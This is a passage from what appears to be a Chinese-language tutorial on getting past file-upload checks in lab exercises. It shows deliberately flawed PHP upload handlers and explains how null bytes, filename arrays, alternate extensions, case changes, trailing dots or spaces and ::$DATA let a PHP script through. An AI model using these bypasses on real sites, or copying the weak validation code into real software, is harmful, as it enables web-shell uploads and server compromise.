<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5somd3t9j310c05gjrj.jpg" alt="文件上传-00截断7.png"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5smgnjrzj311e0gbae2.jpg" alt="文件上传-00截断6.png"></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5smgkakhj3105055mxc.jpg" alt="文件上传-00截断5.png"></p>
<p>修改十六进制,添加一个00字节</p>
<p>然后上传</p>
<p>有时候也可以直接写成<code>../upload/test.php.jpg</code></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5rjhb6igj30do0203yn.jpg" alt="文件上传-00截断3.png"></p>
<p>上传之后直接访问<code>/upload/test.php</code>即可</p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>
<h5 id="截断绕过"><a href="#截断绕过" class="headerlink" title="截断绕过"></a>截断绕过</h5><p> 截断绕过都是文件名字中不允许出现某些字符</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">%<span class="number">00</span></span><br><span class="line"><span class="number">0</span>x00</span><br><span class="line">:</span><br><span class="line">;</span><br><span class="line"><span class="string">'</span></span><br><span class="line"><span class="string">"</span></span><br><span class="line"><span class="string">^</span></span><br></pre></td></tr></table></figure>
<h5 id="数组绕过"><a href="#数组绕过" class="headerlink" title="数组绕过"></a>数组绕过</h5><p>通过file<sub>n<sub>ame = reset(file) . ‘.’ . file[count(file) - 1];<br>可以知道最终的文件名是由数组的第一个和最后一个元素拼接而成,如果上传不是不是数组,就自己拆成数组,就提供了绕过条件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>])){</span><br><span class="line"> <span class="comment">//检查MIME</span></span><br><span class="line"> <span class="variable">$allow_type</span> = <span class="keyword">array</span>(<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>,<span class="string">'image/gif'</span>);</span><br><span class="line"> <span class="keyword">if</span>(!in_array(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>],<span class="variable">$allow_type</span>)){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该类型文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//检查文件名</span></span><br><span class="line"> <span class="variable">$file</span> = <span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">'save_name'</span>]) ? <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] : <span class="variable">$_POST</span>[<span class="string">'save_name'</span>];</span><br><span class="line"> <span class="keyword">if</span> (!is_array(<span class="variable">$file</span>)) {</span><br><span class="line"> <span class="variable">$file</span> = explode(<span class="string">'.'</span>, strtolower(<span class="variable">$file</span>));</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ext</span> = end(<span class="variable">$file</span>);</span><br><span class="line"> <span class="variable">$allow_suffix</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$ext</span>, <span class="variable">$allow_suffix</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该后缀文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$file_name</span> = reset(<span class="variable">$file</span>) . <span class="string">'.'</span> . <span class="variable">$file</span>[count(<span class="variable">$file</span>) - <span class="number">1</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> .<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传成功!"</span>;</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传失败!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"请选择要上传的文件!"</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>上传php文件,抓包,修改以下内容</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq8rg3w13qj30lx09v0u7.jpg" alt="文件上传-数组.png"></p>
<p>最后上传的文件为<code>test.php</code>,直接访问即可</p>
<h4 id="黑名单"><a href="#黑名单" class="headerlink" title="黑名单"></a>黑名单</h4><h5 id="上传特殊可解析后缀"><a href="#上传特殊可解析后缀" class="headerlink" title="上传特殊可解析后缀"></a>上传特殊可解析后缀</h5><p>服务端进行黑名单验证,当上传的文件后缀是asp,aspx,php,jsp时,文件禁止上传</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>一个语言的后缀不一定是唯一的,我们上传同类后缀也可以执行脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">PHP:php,php2,php3,php4,php5,phtml,pht</span><br><span class="line">ASP:asp,aspx,ascx,ashx,cer,asa,asmx</span><br><span class="line">JSP:jsp,jspx,jspf,jsw</span><br><span class="line">exe:exe,exee</span><br><span class="line">....</span><br></pre></td></tr></table></figure>
<h5 id="后缀大小写绕过"><a href="#后缀大小写绕过" class="headerlink" title="后缀大小写绕过"></a>后缀大小写绕过</h5><p>在语言中,后缀的大小写是不影响使用的,所以,即使后缀是PHP,Php等这样的后缀也被看作php执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>我们发现,服务器对所有类型文件的扩展都禁止上传,包括.htaccess</p>
<p>但是并没有对扩展名的大小写进行限制</p>
<p>源码中少了这一句,此代码把所有上传文件的后缀改成小写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file_ext = strtolower($file_ext); //转换为小写</span><br></pre></td></tr></table></figure>
<p>这里我们通过修改文件扩展名的大小写进行绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">xxx.phP</span><br><span class="line">XXX.PhP</span><br><span class="line">XXX.pHP</span><br><span class="line">xxx.PHp</span><br></pre></td></tr></table></figure>
<h5 id="点绕过"><a href="#点绕过" class="headerlink" title="点绕过"></a>点绕过</h5><p>在Windows中文件后缀名末尾有点的会自动去掉点</p>
<p>例如“test.php.”,在Windows中会自动去掉末尾的点变成“test.php”</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>利用Windows的特性,以上代码中没有对点进行处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br></pre></td></tr></table></figure>
<p>这里我们把上传的文件后面加一个点即可绕过,例如<code>test.php.</code></p>
<h5 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h5><p>在Windows中文件后缀名末尾有空格会自动去掉</p>
<p>例如<code>test.php </code>,在Windows中会自动去掉末尾的空格变成<code>test.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>以上代码中没有对空格进行处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br></pre></td></tr></table></figure>
<p>这里我们构造文件名<code>tets.php </code>,在最后添加一个空格即可绕过</p>
<h5 id="DATA绕过"><a href="#DATA绕过" class="headerlink" title="::$DATA绕过"></a>::$DATA绕过</h5><p>利用Windows+php的特性,如果文件名+<code>"::$DATA"</code>会把<code>::$DATA</code>之后的数据当成文件流处理,不会检测后缀名,且保持<code>::$DATA</code>之前的文件名,他的目的就是不检查后缀名</p>
<p>例如:<code>"test.php::$DATA"</code>Windows会自动去掉末尾的<code>::$DATA</code>变成<code>"test.php"</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span 